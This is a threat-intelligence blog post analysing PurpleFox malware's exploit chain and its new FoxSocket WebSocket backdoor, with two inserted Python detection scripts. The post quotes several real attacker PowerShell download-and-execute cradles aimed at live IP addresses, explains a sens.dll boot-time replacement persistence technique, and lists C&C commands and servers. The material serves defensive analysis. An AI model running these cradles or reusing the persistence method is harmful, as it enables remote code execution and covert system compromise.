https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html
PurpleFox Adds New Backdoor That Uses WebSockets
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy
October 19, 2021
Read time: 9 min (2524 words)

In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks. We also found a new backdoor written in .NET implanted during the intrusion, which we believe is highly associated with PurpleFox. This backdoor, which we call FoxSocket, leverages WebSockets to communicate with its command-and-control (C&C) servers, resulting in a more robust and secure means of communication compared to regular HTTP traffic.

We believe that this particular threat is currently being aimed at users in the Middle East. We first encountered this threat via customers in the region, and we are currently investigating whether it has been found in other parts of the world. In this blog, we describe some of the observed modifications to the initial PurpleFox payloads, alongside the new implanted .NET backdoor and the C&C infrastructure serving its functionality.

PurpleFox Capabilities and Technical Analysis

PowerShell

The activity starts with either of the following PowerShell commands being executed:

* "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png"
* "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png"

These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of them located in China:

Table 1. Location of PurpleFox servers

Country          Server count
China            345
India            34
Brazil           29
United States    26
Others           113

The fetched payload is a long script consisting of three components:

1. Tater (Hot Potato – privilege escalation)
2. PowerSploit
3. Embedded exploit bundle binary (privilege escalation)

The script targets 64-bit systems. It starts by checking the Windows version and the applied hotfixes for the vulnerabilities it targets:

* Windows 7/Windows Server 2008
  * CVE-2020-1054 (KB4556836, KB4556843)
  * CVE-2019-0808 (KB4489878, KB4489885, KB2882822)
* Windows 8/Windows Server 2012
  * CVE-2019-1458 (KB4530702, KB4530730)
* Windows 10/Windows Server 2019
  * CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)

After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary, passing the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command. The goal is to install the MSI package as an administrator without any user interaction.

MSI Package

The MSI package starts by removing the following registry keys, which belong to old PurpleFox installations if any are present:

* HKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10}

It then installs the components of the PurpleFox backdoor (dbcode21mk.log and setupact64.log) to the Windows directory. Afterward, it sets two registry values under the key HKLM\SYSTEM\CurrentControlSet\Control\Session Manager:

* AllowProtectedRenames to 0x1, and
* PendingFileRenameOperations to the following:

  \??\C:\Windows\AppPatch\Acpsens.dll
  \??\C:\Windows\system32\sens.dll
  \??\C:\Windows\AppPatch\Acpsens.dll
  \??\C:\Windows\system32\sens.dll
  \??\C:\Windows\setupact64.log
  \??\C:\Windows\system32\sens.dll

These entries move sens.dll to C:\Windows\AppPatch\Acpsens.dll and replace it with the installed file setupact64.log.
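The two Session Manager values described above can be audited offline. As an added example (not Trend Micro's code; the registry data is constructed here to mirror what the article describes, and the trusted-source directory list is an assumption of this example), the following Python pairs up a PendingFileRenameOperations value and flags boot-time renames that replace or displace a System32 file from outside the component store:

```python
"""Check the two Session Manager values the PurpleFox MSI sets.

Added example, not Trend Micro's code. The registry data below is
constructed to mirror what the article describes, so the check runs
offline; on a live host the same data comes from winreg.QueryValueEx on
HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager
("PendingFileRenameOperations" is REG_MULTI_SZ, "AllowProtectedRenames"
is REG_DWORD).
"""
from typing import List, Optional, Tuple

# Directories a file may legitimately be renamed into System32 from at boot
# (the component store and the system directories). This list is an
# assumption of the example; tune it for your estate.
TRUSTED_SOURCE_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)
PROTECTED_DIR = "c:\\windows\\system32\\"

# Constructed sample modelled on the article: sens.dll is parked as
# AppPatch\Acpsens.dll and the dropped setupact64.log takes its place.
SAMPLE_PENDING = [
    r"\??\C:\Windows\system32\sens.dll",
    r"!\??\C:\Windows\AppPatch\Acpsens.dll",
    r"\??\C:\Windows\setupact64.log",
    r"!\??\C:\Windows\system32\sens.dll",
]
SAMPLE_ALLOW_PROTECTED_RENAMES = 1


def normalise(entry: str) -> Optional[str]:
    """Drop the '!' (replace-existing) flag and the NT '\\??\\' prefix and
    lower-case the path; an empty destination (None) means delete at boot."""
    entry = entry.strip()
    if entry.startswith("!"):
        entry = entry[1:]
    if entry.startswith("\\??\\"):
        entry = entry[4:]
    return entry.lower() or None


def rename_pairs(multi_sz: List[str]) -> List[Tuple[Optional[str], Optional[str]]]:
    """PendingFileRenameOperations is a flat REG_MULTI_SZ laid out as
    source, destination, source, destination, ..."""
    if len(multi_sz) % 2:
        raise ValueError("odd entry count: value is truncated or corrupt")
    return [(normalise(multi_sz[i]), normalise(multi_sz[i + 1]))
            for i in range(0, len(multi_sz), 2)]


def suspicious_renames(multi_sz: List[str], allow_protected_renames: int) -> List[str]:
    """One finding per boot-time rename that puts a file into System32 from
    outside the trusted directories, or moves a System32 file elsewhere."""
    findings = []
    for src, dst in rename_pairs(multi_sz):
        if src is None or dst is None:
            continue  # deletions are not covered by this check
        if dst.startswith(PROTECTED_DIR) and not src.startswith(TRUSTED_SOURCE_DIRS):
            findings.append(f"{dst} will be replaced at boot by {src}")
        elif src.startswith(PROTECTED_DIR) and not dst.startswith(PROTECTED_DIR):
            findings.append(f"{src} will be moved at boot to {dst}")
    if findings and allow_protected_renames == 1:
        findings.append("AllowProtectedRenames=1: protected system files may be renamed at boot")
    return findings


if __name__ == "__main__":
    for line in suspicious_renames(SAMPLE_PENDING, SAMPLE_ALLOW_PROTECTED_RENAMES):
        print(line)
```

A legitimate servicing operation (source under WinSxS, destination in System32) produces no finding, so the check can run as a scheduled baseline rather than only during incident response.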
The MSI package then runs a .vbs script that creates a Windows Firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted so that the PendingFileRenameOperations take place, replacing sens.dll; this makes the malware run as the System Event Notification Service (SENS).

PurpleFox Backdoor

The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs that provide its functionality. It also has a rootkit driver, also unpacked from the data file, which is used to hide its files, registry keys, and processes.

The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file. Afterward, it loads the driver to hide its files and registry keys, and then spawns a sequence of 32-bit processes into which it injects its code modules, as these are 32-bit DLLs.

Figure 1. PurpleFox installation process

WebSocket Backdoor

Initial Delivery

The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server. The Trend Micro Vision One™ platform flagged the following suspicious PowerShell commands:

* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))"
* "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))"

Figure 2. Trend Micro Vision One alert for PowerShell commands

We analyzed the payloads hosted on these URLs, which were variations of 185[.]112.144.245/a/[1-9], and found that all of them served one of two variants of another PowerShell script that acts as the main downloader for the .NET backdoor.

Figure 3. Contents of payload

The difference between the two observed PowerShell scripts was in the Base64-encoded data passed as an argument to the .NET sample downloaded from 185[.]112[.]144[.]45/a/data and finally invoked with this configuration parameter. We found two different configuration parameters in use: we observed the first one on August 26 and the second one, with more domains embedded, on August 30. The decoded Base64 configuration parameters are shown in the following figures:

Figure 4. August 26 configuration
Figure 5. August 30 configuration

These configuration parameters are used by the .NET initialization routines to pick a C&C server and initialize the cryptographic functions for the C&C channel. Aside from the configuration, the payload itself is retrieved from 185.112.144[.]45/a/data.
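The PowerShell cradles quoted here and in the earlier PowerShell section share one shape: Invoke-Expression fed by a Net.WebClient download, optionally followed by the MsiMake call. As an added example (not Trend Micro's code; the process-creation records below are constructed from the command lines quoted on the page, kept defanged, plus one benign control line), this Python detector flags that shape, notes the policy-bypass switches, and extracts the fetched URLs:

```python
"""Flag PowerShell download cradles of the kind the PurpleFox chain uses.

Added example, not Trend Micro's code. The records below are constructed
process-creation events; the command lines are the ones quoted in the
article, left in their defanged form, plus one benign line as a control.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample, one event per line: "<timestamp> <host> <image> <command line>".
SAMPLE_EVENTS = [
    "2021-08-26T10:01:02Z sql01 cmd.exe \"cmd.exe\" /c powershell -nop -exec bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');"
    "MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png\"",
    "2021-08-29T15:42:10Z sql01 cmd.exe \"cmd.exe\" /c powershell -c "
    "\"iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))\"",
    "2021-08-29T16:00:00Z sql01 cmd.exe \"cmd.exe\" /c powershell -c \"Get-Date\"",
]

# Scheme may be defanged (hxxp, [:] or [[:]]) in shared reports or live (http://) in telemetry.
URL_RE = re.compile(r"(?:hxxps?|https?)(?:\[{1,2}:\]{1,2}|:)//[^\s'\")]+", re.I)
CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"downloadstring|downloadfile|net\.webclient", re.I)
EVASION_RE = re.compile(r"-nop\b|-exec(?:utionpolicy)?\s+bypass|-w(?:indowstyle)?\s+hidden", re.I)
MSIMAKE_RE = re.compile(r"\bmsimake\b", re.I)


@dataclass
class Finding:
    host: str
    urls: List[str]
    indicators: List[str] = field(default_factory=list)


def analyse_command_line(host: str, cmdline: str) -> Optional[Finding]:
    """A cradle is IEX/Invoke-Expression combined with a WebClient download;
    the other patterns do not trigger on their own but are reported as extra
    indicators when the cradle is present."""
    if not (CRADLE_RE.search(cmdline) and FETCH_RE.search(cmdline)):
        return None
    indicators = ["iex + Net.WebClient download cradle"]
    if EVASION_RE.search(cmdline):
        indicators.append("profile/execution-policy bypass switches")
    if MSIMAKE_RE.search(cmdline):
        indicators.append("MsiMake call (PurpleFox MSI installer stage)")
    return Finding(host=host, urls=URL_RE.findall(cmdline), indicators=indicators)


def scan_events(lines: List[str]) -> List[Finding]:
    """Parse each constructed event and return the findings in input order."""
    findings = []
    for line in lines:
        # Fields: timestamp, host, image, then the command line (which may contain spaces).
        _ts, host, _image, cmdline = line.split(" ", 3)
        finding = analyse_command_line(host, cmdline)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f.host, f.indicators, f.urls)
```

The extracted URLs can be fed to an egress/proxy lookup to confirm whether the download succeeded, which distinguishes a blocked attempt from a host that needs the MSI and Session Manager checks that follow.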
We also found some older variants that date back to June 22 and have fewer capabilities than the more recent ones. During the earliest iterations of deploying this backdoor, which align with the creation date of the malicious domain advb9fyxlf2v[.]com, the configuration parameters contained a minimal number of subdomains for contacting the C&C servers compared to the recent one.

Figure 6. Backdoor configuration

.NET Backdoor

Obfuscation

Let us start the analysis with the backdoor dropped on the SQL server. When decompiled, it shows obfuscated symbols, most of which cannot be restored to the originals. Merely making them human-readable is sufficient for basic static analysis, and sometimes some of the original names can be restored.

Figure 7. Cleaned classes and method names

One notable characteristic we rarely see in malware is the use of WebSocket communication to the C&C servers, which provides an efficient bidirectional channel between the infected client and the server. WebSocket is a communication technology that allows streams of data to be exchanged between a client and a server over a single TCP session, unlike traditional request/response protocols such as HTTP. This gives the threat actor a more covert alternative to HTTP request and response traffic, creating an opportunity for quieter exfiltration with a lower likelihood of detection.

Figure 8. Traditional (left) and WebSocket techniques (right)

The backdoor initializes a WebSocket connection with its C&C server and keeps it open by sending keepalive messages to maintain the TCP connection. Once this is established, a series of bidirectional messages is exchanged between the infected machine and the selected C&C server to negotiate a session encryption key.

Figure 9. TCP/IP exchanges between client and server

The execution starts by initializing the WebSocket and registering four callback functions as handlers for the WebSocket events.

Figure 10. Function for registering callback functions

One of the relevant callbacks is onOpen, which initializes the C&C channel encryption parameters when the WebSocket object fires for the first time. As shown in the next section, this mainly implements the first Diffie-Hellman (DH) key exchange message with the C&C server. On the other side, the onReceive handler processes and dispatches all the commands received from the server after a secure communication channel is established and once the session encryption key is updated.

Key Negotiations

The first key exchange with the C&C server is carried out by the registered onOpen callback function, as seen in Figure 11.

Figure 11. onOpen function

It initializes the ECDH object with some parameters to start the shared secret key negotiation. The ECDiffieHellmanKeyDerivationFunction property is then set to Hash. This property specifies the key derivation function that the ECDiffieHellmanCng class uses to convert secret agreements into key material, so a hash algorithm is used to generate the key material (instead of HMAC or TLS). Afterward, the client sends the PublicKey property, which is used on the C&C side with another ECDiffieHellmanCng object to generate a shared secret agreement. Eventually, this data is sent over the WebSocket as the first key exchange message. However, instead of sending it in cleartext, the client applies symmetric AES encryption to any communication over the WebSocket; for the first exchange, as no shared secret is established yet, the AES encryption uses a default key.

Figures 12-13. Function and code for the AES encryption key

This results in the key negotiation message being encrypted with AES using the shown parameters and a dummy key (111….11)[32], named byte_0 in the following debugging session; the resulting AES ciphertext has a fixed length of 176 bytes.

Figure 14. Structure of key exchange message

The 176 encrypted bytes are the actual data sent over the WebSocket, which marks the end of the first key exchange message.

Second Exchange (C&C to Victim)

The second key exchange message is sent from the server to the client and is handled by the onReceive function. The execution is invoked by the message handler.

Figure 15. Invoking the onReceive function

This AES-encrypted second exchange has a fixed length of 304 bytes.

Figure 16. Contents of incoming message

The client then checks whether this incoming message is related to the control-plane key establishment or is just a normal data command. If it is the former, the first step is to decrypt the symmetric encryption on the C&C channel and then finalize the shared secret generation by handing execution to the ECDH derivation function method_7.

Figure 17. Handoff to method_7 function

The client verifies the signed message using the RSA public key loaded from the configuration payload shown in the previous section. If the signature verifies correctly, key material is derived from the DH exchange and saved as the permanent symmetric AES encryption key (the Symmetric_AES_key variable), which is used for as long as the WebSocket channel is active.

Figure 18. method_7 function

Third Exchange (Victim to C&C)

Once an encrypted session is established over the WebSocket, the client fingerprints the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and relays this data over the secure channel so that the victim is profiled at the server side. This is the final exchange before the WebSocket channel is fully established. The client then listens for further commands, which are covered in the next section.

As the fingerprinting data collected differs from one execution environment to another, this message varies in length. In our lab analysis, it was 240 bytes with the newly generated shared secret key.

Figure 19. Newly generated secret key

As long as the WebSocket is maintained with the keepalive messages shown earlier, the operators can signal any command to be executed, so what happens next depends mainly on the targeting and the actual motivation of the operator.

WebSocket Commands

In this section, we cover some of the observed commands sent from the server. There are some minor differences between variants with regard to the command numbers and the supported functionality. All command handling is implemented in the main dispatch routine (except for command 160, which is used for key negotiation or renegotiation).

Table 2. List of commands

Command code   Functionality
20             Sends the current date on the victim machine
30             Leaks DriveInfo.GetDrives() results for all drives
40             Leaks DirectoryInfo() results for a specific directory
50             FileInfo() results for a specific file
60             Recursive directory search
70             Executes WMI queries (ManagementObjectSearcher())
80             Closes the WebSocket session
90             Exits the process
100            Spawns a new process
110            Downloads more data from a specific URL to the victim machine
120            DNS lookup from the victim machine
130            Leaks specific file contents from the victim machine
140            Writes new content to a specific location
150            Downloads data, then writes it to a specific file
160            Renegotiates the session key for symmetric encryption
180            Gets the current process ID/name
210            Returns the configuration parameter for the backdoor
220            Kills the process, then starts a new process with a different config
230            Kills a specific process by PID
240            Queries internal backdoor object properties
260            Leaks hashes of specific requested files
270            Kills a list of PIDs
280            Deletes a list of requested files/directories
290            Moves a list of files/directories to another location
300            Creates a new directory at a specific location

WebSocket C&C Infrastructure

At the time of this writing, there were several active C&C servers controlling the WebSocket clients. By profiling the infected targets and interacting through the different commands sent, we listed the observed IP addresses and the registered domains found in the PowerShell downloaders and the backdoor configuration parameters.

Table 3. WebSocket C&C servers

IP address        Description                                 ASN                    Notable activity
185.112.144.245   Hosting PS payloads (/a/[1-9]);             AS 44925 (1984 ehf)    Iraq, Saudi Arabia, Turkey, UAE
                  hosting .NET payload (/a/data)
185.112.147.50    C&C server                                                         Turkey, US, UAE
185.112.144.101                                                                      Turkey
93.95.226.157                                                                        US
93.95.228.163                                                                        US
93.95.227.183                                                                        -
93.95.227.169                                                                        UAE
93.95.227.179                                                                        -
185.112.146.72    Potential C&C server                                               -
185.112.146.83                                                                       -

The backdoor picks one subdomain randomly from the configuration data and tries to connect via WebSockets. If it fails to connect on port 12345, it tries to resolve another subdomain.

Figure 20. Random C&C servers

The main domain advb9fyxlf2v[.]com used by these servers, registered on June 17, 2021, within days of the first observed variant, is mainly for load balancing across the multiple active servers.

Conclusion

The rootkit capabilities of PurpleFox make it more capable of carrying out its objectives in a stealthier manner. They allow PurpleFox to persist on affected systems as well as deliver further payloads to them. We are still monitoring these new variants and their dropped payloads. The new .NET WebSocket backdoor (called FoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) is being closely monitored to discover more information about this threat actor's intentions and objectives.

Trend Micro Solutions and Indicators of Compromise

The capabilities of the Trend Micro Vision One platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts at exploitation.
The Trend Micro Vision One Workbench shows a holistic view of the activities observed in a user's environment by highlighting important attributes related to the attack. Trend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing a 24/7 service that gives organizations a single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.

All IOCs related to this attack can be found in this separate file.

Tags: Malware | Endpoints | Research | Articles, News, Reports | Cyber Threats

Authors
* Abdelrhman Sharshar, Threat Intelligence Analyst
* Jay Yaneza, Director, MDR Operations
* Sherif Magdy, Threat Intelligence Analyst

Copyright © 2021 Trend Micro Incorporated. All rights reserved.